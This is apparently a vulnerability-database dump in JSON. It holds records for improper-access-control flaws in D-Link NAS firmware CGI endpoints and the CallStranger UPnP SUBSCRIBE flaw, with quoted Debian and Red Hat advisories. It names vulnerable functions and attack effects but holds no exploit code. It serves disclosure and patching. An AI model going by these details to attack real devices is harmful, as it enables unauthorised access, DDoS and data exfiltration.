"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "cna@vuldb.com",
"id": "CVE-2026-5311",
"trust": 1.0,
"value": "Medium"
},
{
"author": "OTHER",
"id": "JVNDB-2026-010317",
"trust": 0.8,
"value": "Medium"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010317"
},
{
"db": "NVD",
"id": "CVE-2026-5311"
}
]
},
"description": {
"_id": null,
"data": "A security flaw has been discovered in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. Affected is the function Webdav_Access_List of the file /cgi-bin/file_center.cgi. Performing a manipulation of the argument cmd results in improper access controls. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. This vulnerability affects files. The method for exploiting the vulnerability has been made public and could be used to carry out attacks.There is a possibility that some of the information handled by the software may be leaked to the outside. However, the information handled by the software will not be rewritten. Furthermore, the software will not stop",
"sources": [
{
"db": "NVD",
"id": "CVE-2026-5311"
},
{
"db": "JVNDB",
"id": "JVNDB-2026-010317"
}
],
"trust": 1.62
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2026-5311",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2026-010317",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010317"
},
{
"db": "NVD",
"id": "CVE-2026-5311"
}
]
},
"id": "VAR-202604-0419",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.6016763333333334
},
"last_update_date": "2026-04-11T00:02:03.907000Z",
"patch": {
"_id": null,
"data": [
{
"title": "//vuldb.com/vuln/354640",
"trust": 0.8,
"url": "https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_171/171.md"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010317"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-284",
"trust": 1.0
},
{
"problemtype": "CWE-266",
"trust": 1.0
},
{
"problemtype": "Improper permission settings (CWE-266) [ others ]",
"trust": 0.8
},
{
"problemtype": " Inappropriate access control (CWE-284) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010317"
},
{
"db": "NVD",
"id": "CVE-2026-5311"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://www.dlink.com/"
},
{
"trust": 1.0,
"url": "https://vuldb.com/vuln/354640/cti"
},
{
"trust": 1.0,
"url": "https://vuldb.com/vuln/354640"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/d-link8/vuln_171/171.md"
},
{
"trust": 1.0,
"url": "https://vuldb.com/submit/780441"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2026-5311"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010317"
},
{
"db": "NVD",
"id": "CVE-2026-5311"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010317",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2026-5311",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2026-04-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2026-010317",
"ident": null
},
{
"date": "2026-04-01T20:16:29.950000",
"db": "NVD",
"id": "CVE-2026-5311",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2026-04-09T01:41:00",
"db": "JVNDB",
"id": "JVNDB-2026-010317",
"ident": null
},
{
"date": "2026-04-07T15:43:56.293000",
"db": "NVD",
"id": "CVE-2026-5311",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "D-Link\u00a0Corporation of dnr-202l\u00a0 Multiple vulnerabilities in multiple products, including firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010317"
}
],
"trust": 0.8
}
}
VAR-202604-0545
Vulnerability from variot - Updated: 2026-04-11 00:02A weakness has been identified in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. Affected by this vulnerability is the function FMT_restart/Status_HDInfo/SMART_List/ScanDisk_info/ScanDisk/volume_status/Get_Volume_Mapping/FMT_check_disk_remount_state/FMT_rebuildinfo/FMT_result_list/FMT_result_list_phy/FMT_get_dminfo/FMT_manually_rebuild_info/Get_current_raidtype of the file /cgi-bin/dsk_mgr.cgi. Executing a manipulation can lead to improper access controls. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. D-Link of DNS-120 , DNR-202L , DNS-315L , DNS-320 , DNS-320L , DNS-320LW , DNS-321 , DNR-322L , DNS-323 , DNS-325 , DNS-326 , DNS-327L , DNR-326 , DNS-340L , DNS-343 , DNS-345 , DNS-726-4 , DNS-1100-4 , DNS-1200-05 and DNS-1550-04 (( 2026 Year 2 Moon 5 A vulnerability was identified (up to [date]). Exploits for this vulnerability are publicly available and could be used to attack.Information handled by the software will not be leaked to the outside. Information handled by the software will not be rewritten. In addition, part of the software may stop functioning. Furthermore, attacks exploiting this vulnerability will not affect other software
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "dnr-202l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-343",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-322l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dnr-326",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-320lw",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-320",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-1100-4",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-315l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-345",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-326",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-340l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-327l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-320l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-323",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-120",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-1200-05",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-321",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-325",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-1550-04",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-726-4",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-726-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-340l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-315l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dnr-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-1550-04",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-325",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-343",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-345",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-322l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-323",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-320lw",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-1100-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-327l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-320",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-1200-05",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-320l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dnr-202l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-120",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-321",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010316"
},
{
"db": "NVD",
"id": "CVE-2026-5312"
}
]
},
"cve": "CVE-2026-5312",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2026-5312",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "OTHER",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2026-010316",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2026-5312",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "Low",
"baseScore": 5.3,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2026-010316",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "cna@vuldb.com",
"id": "CVE-2026-5312",
"trust": 1.0,
"value": "Medium"
},
{
"author": "OTHER",
"id": "JVNDB-2026-010316",
"trust": 0.8,
"value": "Medium"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010316"
},
{
"db": "NVD",
"id": "CVE-2026-5312"
}
]
},
"description": {
"_id": null,
"data": "A weakness has been identified in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. Affected by this vulnerability is the function FMT_restart/Status_HDInfo/SMART_List/ScanDisk_info/ScanDisk/volume_status/Get_Volume_Mapping/FMT_check_disk_remount_state/FMT_rebuildinfo/FMT_result_list/FMT_result_list_phy/FMT_get_dminfo/FMT_manually_rebuild_info/Get_current_raidtype of the file /cgi-bin/dsk_mgr.cgi. Executing a manipulation can lead to improper access controls. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. D-Link of DNS-120 , DNR-202L , DNS-315L , DNS-320 , DNS-320L , DNS-320LW , DNS-321 , DNR-322L , DNS-323 , DNS-325 , DNS-326 , DNS-327L , DNR-326 , DNS-340L , DNS-343 , DNS-345 , DNS-726-4 , DNS-1100-4 , DNS-1200-05 and DNS-1550-04 (( 2026 Year 2 Moon 5 A vulnerability was identified (up to [date]). Exploits for this vulnerability are publicly available and could be used to attack.Information handled by the software will not be leaked to the outside. Information handled by the software will not be rewritten. In addition, part of the software may stop functioning. Furthermore, attacks exploiting this vulnerability will not affect other software",
"sources": [
{
"db": "NVD",
"id": "CVE-2026-5312"
},
{
"db": "JVNDB",
"id": "JVNDB-2026-010316"
}
],
"trust": 1.62
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2026-5312",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2026-010316",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010316"
},
{
"db": "NVD",
"id": "CVE-2026-5312"
}
]
},
"id": "VAR-202604-0545",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.6016763333333334
},
"last_update_date": "2026-04-11T00:02:03.860000Z",
"patch": {
"_id": null,
"data": [
{
"title": "https",
"trust": 0.8,
"url": "https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_172/172.md"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010316"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-284",
"trust": 1.0
},
{
"problemtype": "CWE-266",
"trust": 1.0
},
{
"problemtype": "Improper permission settings (CWE-266) [ others ]",
"trust": 0.8
},
{
"problemtype": " Inappropriate access control (CWE-284) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010316"
},
{
"db": "NVD",
"id": "CVE-2026-5312"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://www.dlink.com/"
},
{
"trust": 1.0,
"url": "https://vuldb.com/submit/780442"
},
{
"trust": 1.0,
"url": "https://vuldb.com/vuln/354641"
},
{
"trust": 1.0,
"url": "https://vuldb.com/submit/780443"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/d-link8/vuln_172/172.md"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/d-link8/vuln_173/173.md"
},
{
"trust": 1.0,
"url": "https://vuldb.com/vuln/354641/cti"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2026-5312"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010316"
},
{
"db": "NVD",
"id": "CVE-2026-5312"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010316",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2026-5312",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2026-04-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2026-010316",
"ident": null
},
{
"date": "2026-04-01T21:17:03.613000",
"db": "NVD",
"id": "CVE-2026-5312",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2026-04-09T01:41:00",
"db": "JVNDB",
"id": "JVNDB-2026-010316",
"ident": null
},
{
"date": "2026-04-07T15:42:59.280000",
"db": "NVD",
"id": "CVE-2026-5312",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "D-Link\u00a0Corporation of dnr-202l\u00a0 Multiple vulnerabilities in multiple products, including firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010316"
}
],
"trust": 0.8
}
}
VAR-202006-0391
Vulnerability from variot - Updated: 2026-04-10 22:22The Open Connectivity Foundation UPnP specification before 2020-04-17 does not forbid the acceptance of a subscription request with a delivery URL on a different network segment than the fully qualified event-subscription URL, aka the CallStranger issue. The Universal Plug and Play (UPnP) protocol in effect prior to April 17, 2020 can be abused to send traffic to arbitrary destinations using the SUBSCRIBE functionality. The UPnP protocol, as specified by the Open Connectivity Foundation (OCF), is designed to provide automatic discovery and interaction with devices on a network. The UPnP protocol is designed to be used in a trusted local area network (LAN) and the protocol does not implement any form of authentication or verification. Many common Internet-connected devices support UPnP, as noted in previous research from Daniel Garcia (VU#357851) and Rapid7. Garcia presented at DEFCON 2019 and published a scanning and portmapping tool. The UPnP Device Protection service was not widely adopted. A vulnerability in the UPnP SUBSCRIBE capability permits an attacker to send large amounts of data to arbitrary destinations accessible over the Internet, which could lead to a Distributed Denial of Service (DDoS), data exfiltration, and other unexpected network behavior. The OCF has updated the UPnP specification to address this issue. This vulnerability has been assigned CVE-2020-12695 and is also known as Call Stranger. Although offering UPnP services on the Internet is generally considered to be a misconfiguration, a number of devices are still available over the Internet according to a recent Shodan scan. A remote, unauthenticated attacker may be able to abuse the UPnP SUBSCRIBE capability to send traffic to arbitrary destinations, leading to amplified DDoS attacks and data exfiltration. In general, making UPnP available over the the Internet can pose further security vulnerabilities than the one described in this vulnerability note. Open Connectivity Foundation UPnP There is a vulnerability in the specification regarding improper default permissions.Information is obtained and service operation is interrupted (DoS) It may be put into a state. A security vulnerability exists in UPnP versions prior to 2020-04-17.
CVE-2020-12695
It was discovered that hostapd does not properly handle UPnP
subscribe messages under certain conditions, allowing an attacker to
cause a denial of service.
CVE-2021-0326
It was discovered that wpa_supplicant does not properly process P2P
(Wi-Fi Direct) group information from active group owners. An
attacker within radio range of the device running P2P could take
advantage of this flaw to cause a denial of service or potentially
execute arbitrary code.
CVE-2021-27803
It was discovered that wpa_supplicant does not properly process
P2P (Wi-Fi Direct) provision discovery requests. An attacker
within radio range of the device running P2P could take advantage
of this flaw to cause a denial of service or potentially execute
arbitrary code.
For the stable distribution (buster), these problems have been fixed in version 2:2.7+git20190128+0c1e29f-6+deb10u3.
We recommend that you upgrade your wpa packages.
For the detailed security status of wpa please refer to its security tracker page at: https://security-tracker.debian.org/tracker/wpa
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmCBxcZfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0QRbw//chJxW9vhszfe/MrHkuEBC/y0jzkQ0GxJG/DT+EXvHnq8KyVht92B81sU Ia860UeNygOY1vAe8izNVpxPEi1PpI7Y6VfvqcWC5dMFNEmOk8yMzJXPDYtwrO3b q7Fq6MJys6HTooIInCVjdwVTmvVfocEiOl2Oy+smBE8ylkUPIShJj+UsnBR3qMCB 9IoxgeFsHl4HpRzsC1uiTMmNPUqqychqzyn26aA+Vp5nfPkvpsSc6aA68BBUm529 5udANpQneYrsQ+EKMm2wQmw9xNWbrqzRUCmi/XGxJ5YEibOjMLZeBMWq35MRQKDS BaaEPbjPMbBP7p6yp795pdt/XgNL1cJPejEBBQWPs3PrRuW/inhjJbSvenPl5AIB wOV8OzoxDw0m5DdYr2IuYRNu3zt743e/v5oDhDOiSteBl7zjs4cUohfOryaH/htN 7Ok3BbhfVc7xfW/XhXNq2axXPGDdSOI3Y6ZXPgiTlX3eIm8Culg7Rm52JprbAc0a aP0pkGjHO3MAIsvRU/H7WGJbhCdS0i/XTAbuJming5zzCpigGaQG9wOawYH4lNJV BNEX/DjjcsZ4oETxWn0sG/LVIl3m2TCry2cayZsy8806nTqlhFS2py5tx6gn5NBi e5JGaYRgwa6TUxj4UjWnbdIKMpElbtXbMIOHSvG2Gnx/21siyg0= =CU/j -----END PGP SIGNATURE----- . In addition minidlna was susceptible to the "CallStranger" UPnP vulnerability. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: gssdp and gupnp security update Advisory ID: RHSA-2021:1789-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:1789 Issue date: 2021-05-18 CVE Names: CVE-2020-12695 ==================================================================== 1. Summary:
An update for gssdp and gupnp is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat CodeReady Linux Builder (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
GUPnP is an object-oriented open source framework for creating UPnP devices and control points, written in C using GObject and libsoup. The GUPnP API is intended to be easy to use, efficient and flexible.
GSSDP implements resource discovery and announcement over SSDP and is part of gUPnP.
The following packages have been upgraded to a later upstream version: gssdp (1.0.5), gupnp (1.0.6). (BZ#1846589, BZ#1861928)
Security Fix(es):
- hostapd: UPnP SUBSCRIBE misbehavior in WPS AP (CVE-2020-12695)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.4 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1846006 - CVE-2020-12695 hostapd: UPnP SUBSCRIBE misbehavior in WPS AP
- Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source: gssdp-1.0.5-1.el8.src.rpm gupnp-1.0.6-1.el8.src.rpm
aarch64: gssdp-1.0.5-1.el8.aarch64.rpm gssdp-debuginfo-1.0.5-1.el8.aarch64.rpm gssdp-debugsource-1.0.5-1.el8.aarch64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm gupnp-1.0.6-1.el8.aarch64.rpm gupnp-debuginfo-1.0.6-1.el8.aarch64.rpm gupnp-debugsource-1.0.6-1.el8.aarch64.rpm
ppc64le: gssdp-1.0.5-1.el8.ppc64le.rpm gssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm gssdp-debugsource-1.0.5-1.el8.ppc64le.rpm gssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm gupnp-1.0.6-1.el8.ppc64le.rpm gupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm gupnp-debugsource-1.0.6-1.el8.ppc64le.rpm
s390x: gssdp-1.0.5-1.el8.s390x.rpm gssdp-debuginfo-1.0.5-1.el8.s390x.rpm gssdp-debugsource-1.0.5-1.el8.s390x.rpm gssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm gupnp-1.0.6-1.el8.s390x.rpm gupnp-debuginfo-1.0.6-1.el8.s390x.rpm gupnp-debugsource-1.0.6-1.el8.s390x.rpm
x86_64: gssdp-1.0.5-1.el8.i686.rpm gssdp-1.0.5-1.el8.x86_64.rpm gssdp-debuginfo-1.0.5-1.el8.i686.rpm gssdp-debuginfo-1.0.5-1.el8.x86_64.rpm gssdp-debugsource-1.0.5-1.el8.i686.rpm gssdp-debugsource-1.0.5-1.el8.x86_64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.i686.rpm gssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm gupnp-1.0.6-1.el8.i686.rpm gupnp-1.0.6-1.el8.x86_64.rpm gupnp-debuginfo-1.0.6-1.el8.i686.rpm gupnp-debuginfo-1.0.6-1.el8.x86_64.rpm gupnp-debugsource-1.0.6-1.el8.i686.rpm gupnp-debugsource-1.0.6-1.el8.x86_64.rpm
Red Hat CodeReady Linux Builder (v. 8):
aarch64: gssdp-debuginfo-1.0.5-1.el8.aarch64.rpm gssdp-debugsource-1.0.5-1.el8.aarch64.rpm gssdp-devel-1.0.5-1.el8.aarch64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm gupnp-debuginfo-1.0.6-1.el8.aarch64.rpm gupnp-debugsource-1.0.6-1.el8.aarch64.rpm gupnp-devel-1.0.6-1.el8.aarch64.rpm
noarch: gssdp-docs-1.0.5-1.el8.noarch.rpm
ppc64le: gssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm gssdp-debugsource-1.0.5-1.el8.ppc64le.rpm gssdp-devel-1.0.5-1.el8.ppc64le.rpm gssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm gupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm gupnp-debugsource-1.0.6-1.el8.ppc64le.rpm gupnp-devel-1.0.6-1.el8.ppc64le.rpm
s390x: gssdp-debuginfo-1.0.5-1.el8.s390x.rpm gssdp-debugsource-1.0.5-1.el8.s390x.rpm gssdp-devel-1.0.5-1.el8.s390x.rpm gssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm gupnp-debuginfo-1.0.6-1.el8.s390x.rpm gupnp-debugsource-1.0.6-1.el8.s390x.rpm gupnp-devel-1.0.6-1.el8.s390x.rpm
x86_64: gssdp-debuginfo-1.0.5-1.el8.i686.rpm gssdp-debuginfo-1.0.5-1.el8.x86_64.rpm gssdp-debugsource-1.0.5-1.el8.i686.rpm gssdp-debugsource-1.0.5-1.el8.x86_64.rpm gssdp-devel-1.0.5-1.el8.i686.rpm gssdp-devel-1.0.5-1.el8.x86_64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.i686.rpm gssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm gupnp-debuginfo-1.0.6-1.el8.i686.rpm gupnp-debuginfo-1.0.6-1.el8.x86_64.rpm gupnp-debugsource-1.0.6-1.el8.i686.rpm gupnp-debugsource-1.0.6-1.el8.x86_64.rpm gupnp-devel-1.0.6-1.el8.i686.rpm gupnp-devel-1.0.6-1.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-12695 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
